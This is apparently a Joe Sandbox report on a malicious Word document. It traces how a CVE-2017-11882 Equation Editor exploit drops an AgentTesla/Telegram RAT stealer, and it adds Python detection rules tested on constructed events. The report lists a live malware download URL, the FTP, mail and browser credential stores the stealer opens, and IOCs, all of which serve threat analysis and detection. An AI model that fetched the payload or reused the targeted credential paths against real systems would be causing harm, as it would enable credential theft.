Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\gudostrp.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
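The two sections above (the Equation Editor fetching and starting gudostrp.exe, which then re-spawns itself and writes an MZ image at base 0x400000, and the file and registry opens on FTP, mail and browser credential stores before the connection to api.telegram.org) map onto a small set of host-telemetry rules. The following is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites: it runs those rules over constructed Sysmon-style events that mirror this report's process tree. The event field names, the credential-store owner process names and the benign control events are assumptions.

```python
"""Detection logic for the chain this report records: Equation Editor fetching
and launching a dropped EXE, that EXE re-spawning itself (self-injection), and
the payload opening FTP/mail/browser credential stores before talking to
api.telegram.org. Added example, not part of the Joe Sandbox report; the event
records are constructed to mirror the report's process tree, and the Sysmon-like
field names and the credential-store owner process names are assumptions."""
import re

EQNEDT = "eqnedt32.exe"
# Image paths under the user's profile are attacker-writable; Program Files is not.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
# Processes that may legitimately reach the Telegram API from a user profile path.
TELEGRAM_ALLOWED = {"chrome.exe", "firefox.exe", "msedge.exe", "telegram.exe"}

# The stores gudostrp.exe touched in the report, each paired with the process that
# owns it (owner names are assumed; tune them to the software actually deployed).
CREDENTIAL_STORES = [
    (r"\\filezilla\\recentservers\.xml$", "filezilla.exe"),
    (r"\\smartftp\\client 2\.0\\favorites\\", "smartftp.exe"),
    (r"\\thunderbird\\profiles\.ini$", "thunderbird.exe"),
    (r"\\mozilla\\firefox\\profiles\.ini$", "firefox.exe"),
    (r"\\google\\chrome\\user data\\[^\\]+\\login data$", "chrome.exe"),
    (r"^hkey_current_user\\software\\martin prikryl\\winscp 2\\sessions", "winscp.exe"),
    (r"\\windows messaging subsystem\\profiles\\outlook\\", "outlook.exe"),
    (r"^hkey_current_user\\software\\incredimail\\identities", "incmail.exe"),
]


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (severity, rule, detail) tuples for every event that matches a rule."""
    alerts = []
    for e in events:
        img = basename(e["image"])
        if e["kind"] == "process":
            parent = basename(e["parent_image"])
            # Equation Editor never needs child processes; the Sigma rules the
            # report cites key on exactly this parent/child relationship.
            if parent == EQNEDT:
                alerts.append(("high", "equation_editor_child", e["image"]))
            # The same image re-launching itself from AppData is the setup behind
            # "Memory written ... base: 400000 value starts with: 4D5A" (hollowing).
            # Some legitimate per-user apps do this too, hence medium severity.
            if parent == img and USER_WRITABLE.search(e["image"]):
                alerts.append(("medium", "self_spawn_from_appdata", e["image"]))
        elif e["kind"] == "network":
            if img == EQNEDT:
                alerts.append(("high", "equation_editor_network", f"{e['dest']}:{e['port']}"))
            if (e.get("host") == "api.telegram.org" and USER_WRITABLE.search(e["image"])
                    and img not in TELEGRAM_ALLOWED):
                alerts.append(("medium", "telegram_api_from_appdata", e["image"]))
        elif e["kind"] in ("file_open", "reg_open"):
            for pattern, owner in CREDENTIAL_STORES:
                if re.search(pattern, e["path"], re.I) and img != owner:
                    alerts.append(("high", "credential_store_access", f"{img} -> {e['path']}"))
                    break
    return alerts


# Constructed events mirroring the report's behaviour graph (not raw sandbox logs).
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
GUD = r"C:\Users\user\AppData\Roaming\gudostrp.exe"
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe"},
    # Equation Editor is COM-activated, so its parent is the DCOM svchost rather
    # than WINWORD.EXE; that is why the rules key on EQNEDT32 as parent/actor.
    {"kind": "process", "image": EQN, "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"kind": "network", "image": EQN, "host": "palangavra.lt", "dest": "144.76.47.167", "port": 80},
    {"kind": "process", "image": GUD, "parent_image": EQN},
    {"kind": "process", "image": GUD, "parent_image": GUD},
    {"kind": "reg_open", "image": GUD, "path": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"kind": "file_open", "image": GUD, "path": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"kind": "file_open", "image": GUD, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "network", "image": GUD, "host": "api.telegram.org", "dest": "149.154.167.220", "port": 443},
    # Benign controls: the owning client reading its own store, and a browser
    # reaching the Telegram API, must stay silent.
    {"kind": "file_open", "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "path": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"kind": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "host": "api.telegram.org", "dest": "149.154.167.220", "port": 443},
]

if __name__ == "__main__":
    for sev, rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{sev:6}] {rule}: {detail}")
```

On the constructed events this yields seven alerts (one for each Equation Editor network connection and child process, one for the self-spawn, three credential-store accesses and one Telegram API connection) and nothing for the two benign controls. The self-spawn and Telegram rules are deliberately medium: per-user applications installed under AppData can legitimately spawn copies of themselves, so those two need an allowlist tuned to the estate before they page anyone.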

                      Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

                      Mitre Att&ck Matrix

Techniques matched by this sample, by tactic (the unmatched template cells of the full matrix are omitted; the digits after a technique are the report's count badges, kept as extracted):

Initial Access: Valid Accounts 1
Execution: Windows Management Instrumentation 211; Exploitation for Client Execution 13
Persistence: Valid Accounts 1
Privilege Escalation: Valid Accounts 1; Access Token Manipulation 1; Process Injection 112
Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 11; Masquerading 1; Valid Accounts 1; Modify Registry 1; Access Token Manipulation 1; Virtualization/Sandbox Evasion 141; Process Injection 112
Credential Access: OS Credential Dumping 2; Credentials in Registry 1
Discovery: File and Directory Discovery 1; System Information Discovery 114; Security Software Discovery 22; Process Discovery 2; Virtualization/Sandbox Evasion 141; Application Window Discovery 1; Remote System Discovery 1
Lateral Movement: none matched
Collection: Archive Collected Data 11; Data from Local System 2; Email Collection 1
Exfiltration: none matched
Command and Control: Web Service 1; Ingress Tool Transfer 12; Encrypted Channel 11; Non-Application Layer Protocol 3; Application Layer Protocol 24
Network Effects, Remote Service Effects, Impact: none matched

                      Behavior Graph

Behavior Graph ID: 502700 | Sample: Purchase Order_0131021.doc | Start date: 14/10/2021 | Architecture: WINDOWS | Score: 100

Signatures on the root node: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures

Process chain recovered from the graph (the graph image itself is not reproduced; the numbers after a process name are the counters drawn on its node):

WINWORD.EXE (291 25) - started from the sample
EQNEDT32.EXE (11) - started from the sample
  - DNS/IP: palangavra.lt 144.76.47.167, remote port 80 (local port 49167), HETZNER-ASDE, Germany
  - dropped: C:\Users\user\AppData\Roaming\gudostrp.exe, PE32
  - dropped: C:\Users\user\AppData\...\gufoxqa[1].exe, PE32
  - signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  - started: gudostrp.exe (2)
gudostrp.exe (2) - first instance
  - signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 2 other signatures
  - started: gudostrp.exe (12 2)
gudostrp.exe (12 2) - second instance
  - DNS/IP: api.telegram.org 149.154.167.220, remote port 443 (local port 49169), TELEGRAMRU, United Kingdom
  - signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Purchase Order_0131021.doc | 37% | Virustotal | (none)
Purchase Order_0131021.doc | 36% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe | 100% | Joe Sandbox ML | (none)
C:\Users\user\AppData\Roaming\gudostrp.exe | 100% | Joe Sandbox ML | (none)

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.2.gudostrp.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://SwonTwAJYn3XCAV3.net | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://api.telegram.orgP | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://palangavra.lt/jukiestay/gufoxqa.exe | 100% | Avira URL Cloud | malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://yBlQIu.com | 0% | Avira URL Cloud | safe

Most of these entries are carved from memory rather than contacted: the CRL, OCSP and CPS URLs come from embedded certificates, http://www.%s.com is a format string, and entries with a trailing stray character (https://api.telegram.orgP, http://www.%s.comPA) are fragments cut at a non-terminated buffer. The indicators that reflect this sample's own behaviour are the palangavra.lt download URL and api.telegram.org; the Tor Browser download URL with its %tordir% placeholder is present in the unpacked payload (see the 00000005...0000000000402000 memory region in the table below) but was not contacted during the run.

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | (none) | high
palangavra.lt | 144.76.47.167 | true | true | (none) | unknown

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://palangavra.lt/jukiestay/gufoxqa.exe | true | Avira URL Cloud: malware | unknown

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://SwonTwAJYn3XCAV3.net | gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNS | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | false | (none) | high
https://api.telegram.org | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | (none) | high
http://crl.entrust.net/server1.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.orgP | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.diginotar.nl/cps/pkioverheid0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp | false | (none) | high
http://ocsp.entrust.net0D | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp | false | (none) | high
https://secure.comodo.com/CPS0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://yBlQIu.com | gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp | false | (none) | high

                                        Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
144.76.47.167 | palangavra.lt | Germany | 24940 | HETZNER-ASDE | true

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:502700
                                        Start date:14.10.2021
                                        Start time:10:22:11
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 18s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Purchase Order_0131021.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 56
                                        • Number of non-executed functions: 1
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
10:22:15 | API Interceptor | 392x Sleep call for process: EQNEDT32.EXE modified
10:22:17 | API Interceptor | 1408x Sleep call for process: gudostrp.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match: 149.154.167.220 (each associated sample below is flagged malicious)
SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe
ek3dgxlAe0.exe
invoice.exe
Ff24G0gf7c.exe
Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html
Nuevo pedido de consulta cotizacin.xlsx
21ITQXL080104122T7.exe
SWIFT_BANKTIA_729928920222.exe
R0987653400008789.exe
T98765434567898.exe
LbmGlrja1Z.exe
photos jpg.exe
mGaZYvxAsr.exe
vbyltST1At.exe
PO B 12.exe
DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe
1st file name DHL - WAYBILL 44 7611 9546.exe
DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe
PRESUPUESTO.xlsx
Message bounce.exe

                                                                                Domains

Match: api.telegram.org (each associated sample below resolved it to 149.154.167.220 and is flagged malicious)
SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe
presupuesto.xlsx
ek3dgxlAe0.exe
invoice.exe
Ff24G0gf7c.exe
Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html
Nuevo pedido de consulta cotizacin.xlsx
21ITQXL080104122T7.exe
SWIFT_BANKTIA_729928920222.exe
R0987653400008789.exe
T98765434567898.exe
LbmGlrja1Z.exe
photos jpg.exe
mGaZYvxAsr.exe
vbyltST1At.exe
PO B 12.exe
DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe
1st file name DHL - WAYBILL 44 7611 9546.exe
DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exe
PRESUPUESTO.xlsx

ASN

Match | Associated Sample Name / URL | Detection | Context
TELEGRAMRU | 6GKjXSaJ8E.exe | malicious | 149.154.167.99
 | SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exe | malicious | 149.154.167.220
 | ek3dgxlAe0.exe | malicious | 149.154.167.220
 | invoice.exe | malicious | 149.154.167.220
 | Ff24G0gf7c.exe | malicious | 149.154.167.220
 | Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.html | malicious | 149.154.167.220
 | Nuevo pedido de consulta cotizacin.xlsx | malicious | 149.154.167.220
 | 21ITQXL080104122T7.exe | malicious | 149.154.167.220
 | JetCe3om9L.exe | malicious | 149.154.167.99
 | frj4kNTbl3.exe | malicious | 149.154.167.99
 | F6RhtCVeTD.exe | malicious | 149.154.167.99
 | SWIFT_BANKTIA_729928920222.exe | malicious | 149.154.167.220
 | R0987653400008789.exe | malicious | 149.154.167.220
 | T98765434567898.exe | malicious | 149.154.167.220
 | LbmGlrja1Z.exe | malicious | 149.154.167.220
 | photos jpg.exe | malicious | 149.154.167.220
 | ET13QJzgLL.exe | malicious | 149.154.167.99
 | mGaZYvxAsr.exe | malicious | 149.154.167.220
 | install.exe | malicious | 149.154.167.99
 | vbyltST1At.exe | malicious | 149.154.167.220
HETZNER-ASDE | Aj#U00e1nlatk#U00e9r#U00e9s 2021.xlsm | malicious | 136.243.159.53
 | vbc.exe | malicious | 116.202.174.203
 | GR01DtRd0N.exe | malicious | 88.99.75.82
 | Payment_Swift,png.exe | malicious | 78.46.56.160
 | PO 211011-021A.exe | malicious | 136.243.159.53
 | S27f5MP8Ue | malicious | 5.75.211.8
 | 75lT7DuXrs.exe | malicious | 168.119.93.163
 | #Ud83d#Udcde-youse.guia-644-46204-282109.htm | malicious | 95.217.53.76
 | 6Vk012xoyn | malicious | 144.79.90.35
 | tmDSSwkOAM | malicious | 94.130.40.209
 | 8r3HRghvXX | malicious | 95.217.66.142
 | ARK Survival legit hack by Spyro.exe | malicious | 135.181.170.169
 | M12s7KNFDg.exe | malicious | 138.201.79.103
 | NBA 2K21 Cheat by Spyro.exe | malicious | 135.181.170.169
 | Gsdqz.dll | malicious | 116.203.98.109
 | 4tOOUNDwaW.exe | malicious | 188.34.163.98
 | 7ofFMoirr5.exe | malicious | 188.34.163.98
 | HUTWMrDhov.dll | malicious | 116.203.98.109
 | SecuriteInfo.com.W32.AIDetect.malware1.10225.exe | malicious | 188.34.163.98
 | 0q3K4qJqQT.exe | malicious | 88.99.75.82

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
36f7277af969a6947a61ae0b815907a1 | Order EQE0905.xlsx | malicious | 149.154.167.220
 | Nuevo pedido de consulta cotizacin.xlsx | malicious | 149.154.167.220
 | Order EQE090.xlsx | malicious | 149.154.167.220
 | PO2008095.xlsx | malicious | 149.154.167.220
 | Order List.xlsx | malicious | 149.154.167.220
 | PRESUPUESTO.xlsx | malicious | 149.154.167.220
 | DHL Original Documents.xlsx | malicious | 149.154.167.220
 | Purchase Order List.xlsm | malicious | 149.154.167.220
 | img_Especificaci#U00f3n_07102021.doc | malicious | 149.154.167.220
 | Purchase Order_0190.doc__.rtf | malicious | 149.154.167.220
 | PO. 2100002.xlsx | malicious | 149.154.167.220
 | PRESUPUESTO.xlsx | malicious | 149.154.167.220
 | 04OCT2021-USD-178,750.00.xlsx | malicious | 149.154.167.220
 | TT remittance.xlsx | malicious | 149.154.167.220
 | TT form.xlsx | malicious | 149.154.167.220
 | 04OCT2021-USD-178,750.00.xlsx | malicious | 149.154.167.220
 | especificaci#U00f3n 0021.doc | malicious | 149.154.167.220
 | RF Quotation_04102021.doc | malicious | 149.154.167.220
 | SteelTrading PO-5579.xlsx.xlsx | malicious | 149.154.167.220
 | IMG_PO-000120741.doc | malicious | 149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 486912
Entropy (8bit): 6.778690362170083
Encrypted: false
SSDEEP: 12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
MD5: BC5F0AA0262021DB5921D726F7A5B820
SHA1: B41245E3BBFC8A7905BFC56B88EA79975595F4F6
SHA-256: B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
SHA-512: A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://palangavra.lt/jukiestay/gufoxqa.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4877C7E7-A321-4438-A27A-0B7C6E560902}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 2560
Entropy (8bit): 2.8100989291245866
Encrypted: false
SSDEEP: 24:IrpyUcwqII99iCDYNR6roVgJReOUyOoX6S66QLsQlNbOa4ZXk/cub505unG:IFyYjI/asJReKOof41b7iZuG
MD5: 2BDACAB3747178F7E0A6F4D7A31F6D11
SHA1: C437C2836EAA2A00BBBA64EC08E0BB40FE4478C8
SHA-256: 3C1F78FABA6BDA5501E0019283F0D25EA06A379B24D2E8C1CA790B6749A08D89
SHA-512: E388641848DDE78678FA3E5F089F66D0AFE7EAE6F19950BBF944D2F4A7144A4F2339990A95A13B6FC241575ECD43E8337FABA23A9255972E452CD27BDB043A3F
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order_0131021.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Thu Oct 14 16:22:13 2021, length=15658, window=hide
Category: dropped
Size (bytes): 1074
Entropy (8bit): 4.525345332508347
Encrypted: false
SSDEEP: 24:8CQ/XTTc+b+QROsdeoZROsiDv3qHwqE/7Eg:8n/XTA+y+OMLOmHTWB
MD5: 5553B96A2ED8B4558BACEB47D38C1748
SHA1: 70A0DA9820F6E3C5E755B8BD90B20705058049F0
SHA-256: 03E1FC72B2CDD61EBC996E5C2F95D4785502F121B329015D72F3B4597FDA7271
